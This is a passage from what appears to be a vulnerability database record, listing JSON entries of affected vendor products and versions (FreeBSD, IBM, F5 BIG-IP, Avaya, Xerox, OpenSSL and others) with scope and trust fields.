"4.6.1" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2227916" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hp-ux b.11.11 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8804259" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-493" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x37508752" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8700072.161.134.32804" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36307158" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5745061.132.224.35203" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7830072.010.134.32804" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93020" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "puredata system for operational analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "bladecenter advanced management module 3.66g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge clients for windows", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6500" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58550" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8900072.161.134.32804" }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408737" }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9302072.180.134.32804" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "3655072.060.134.32804" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.0" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "big-ip edge clients for apple ios", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.2" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x32502583" }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p38", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93030" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5755061.132.224.35203" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.2" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge clients for android", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.5" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "8.4-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "project openssl 0.9.8zb", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip edge clients for windows", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7080" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7225072.030.134.32804" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x31002582" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "6.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge clients for android", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0.4" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.4" }, { "model": "security network intrusion prevention system gx6116", 